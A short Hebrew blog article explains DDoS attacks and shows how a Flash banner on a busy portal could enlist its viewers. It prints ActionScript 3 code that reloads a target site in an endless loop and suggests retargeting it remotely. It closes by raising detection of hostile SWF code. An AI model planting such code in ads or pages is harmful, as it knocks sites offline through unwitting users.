התקפת DDoS באמצעות פלאש

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט).
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.
התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3
package
{
import flash.display.*;
import flash.events.*;
import flash.net.*;

public class DDoS extends MovieClip
{
public var Url:String = "www.website.com"; 
public var UrlLoader:URLLoader = new URLLoader();

public function DDoS() 
{
UrlLoader.addEventListener(Event.COMPLETE, Loop);

Loop();
}

private function Loop(e:Event=null):void
{
UrlLoader.load(new URLRequest(Url));
}}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)
 

אלעד

המאמר נכתב ע"י אלעד כהן - מתכנת פלאש בחברת GAME DEV LTD.

כתיבת תגובה